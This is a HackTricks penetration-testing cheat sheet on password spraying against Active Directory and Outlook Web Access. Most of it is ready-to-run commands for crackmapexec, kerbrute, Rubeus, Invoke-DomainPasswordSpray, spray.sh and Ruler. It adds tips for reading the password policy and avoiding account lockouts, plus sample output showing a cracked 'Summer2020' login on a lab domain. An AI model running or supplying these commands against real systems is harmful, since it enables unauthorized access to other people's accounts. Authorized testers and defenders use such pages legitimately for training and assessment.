Password Spraying

Support HackTricks and get benefits!
Password Spraying
Once you have found several valid usernames you can try the most common passwords (keep in mind the password policy of the environment) with each of the discovered users.
By default the minimum password length is 7.
Lists of common usernames could also be useful: https://github.com/insidetrust/statistically-likely-usernames​
Notice that you could lockout some accounts if you try several wrong passwords (by default more than 10).
Get password policy
If you have some user credentials or a shell as a domain user you can get the password policy with:
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linx -u 'username' -p 'password' -P <IP>
(Get-DomainPolicy)."SystemAccess" #From powerview
Exploitation
Using crackmapexec:
1
crackmapexec smb <IP> -u users.txt -p passwords.txt
Copied!
Using kerbrute(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
1
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
2
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
Copied!
Kerbrute also tells if a username is valid.
Using kerbrute(Go)
1
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
2
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
Copied!
With Rubeus version with brute module:
1
# with a list of users
2
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
3
​
4
# check passwords for all users in current domain
5
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
Copied!
With the scanner/smb/smb_login module of Metasploit:
With Invoke-DomainPasswordSpray​
1
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Copied!
or spray (read next section).
Lockout check
The best way is not to try with more than 5/7 passwords per account.
So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use spray:
1
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Copied!
Outlook Web Access
There are multiples tools for password spraying outlook.
With MSF Owa_login​
with MSF Owa_ews_login​
With Ruler (reliable!)
With DomainPasswordSpray (Powershell)
With MailSniper (Powershell)
To use any of these tools, you need a user list and a password / a small list of passwords to spray.
1
$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
2
    [x] Failed: larsson:Summer2020
3
    [x] Failed: cube0x0:Summer2020
4
    [x] Failed: a.admin:Summer2020
5
    [x] Failed: c.cube:Summer2020
6
    [+] Success: s.svensson:Summer2020
7
    [x] Failed: s.sven:Summer2020
8
    [x] Failed: j.jenny:Summer2020
9
    [x] Failed: t.teresa:Summer2020
10
    [x] Failed: t.trump:Summer2020
11
    [x] Failed: a.adams:Summer2020
12
    [x] Failed: l.larsson:Summer2020
13
    [x] Failed: CUBE0X0:Summer2020
14
    [x] Failed: A.ADMIN:Summer2020
15
    [x] Failed: C.CUBE:Summer2020
16
    [+] Success: S.SVENSSON:Summer2020
Copied!
References :
​https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying​
​https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell​
www.blackhillsinfosec.com/?p=5296
​https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying​
Support HackTricks and get benefits!

Pass the Ticket

Force NTLM Privileged Authentication

Last modified 2mo ago

Copy link

Contents